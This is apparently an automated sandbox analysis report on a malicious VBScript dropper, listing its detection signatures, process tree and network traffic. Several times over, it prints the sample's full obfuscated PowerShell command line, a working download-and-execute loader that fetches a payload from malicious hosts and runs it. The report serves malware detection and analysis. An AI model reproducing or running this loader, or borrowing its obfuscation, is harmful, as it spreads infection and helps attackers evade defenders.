Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
script.vbs

Overview

General Information

Sample name:script.vbs
Analysis ID:1569003
MD5:369a268623fe3fce785ddb3a426f8d0c
SHA1:0bff2afa8619c1071cc6b6ae3bf721cd5f9b3af7
SHA256:14543dc9229fff1538526bcb09a6ad9a3809b3cea089c6adc69dbe7aec438b4c
Tags:Listofrequireditemsvbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4984 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1020 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3504JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_3504.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", ProcessId: 4984, ProcessName: wscript.exe
      Sigma detected: Suspicious Scan Loop Network
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs", ProcessId: 4984, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-05T10:43:55.240728+010028033053Unknown Traffic192.168.2.549705184.171.244.231443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiXAvira URL Cloud: Label: phishing
      Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: script.vbsReversingLabs: Detection: 28%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
      Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49706 version: TLS 1.2
      Source: Binary string: e.pdb source: powershell.exe, 00000001.00000002.3347718533.0000029A4F9B0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3370987794.0000029A6800E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32& source: powershell.exe, 00000001.00000002.3370987794.0000029A6800E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbtp source: powershell.exe, 00000001.00000002.3347718533.0000029A4F9B0000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
      Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
      Source: Joe Sandbox ViewIP Address: 184.171.244.231 184.171.244.231
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 184.171.244.231:443
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
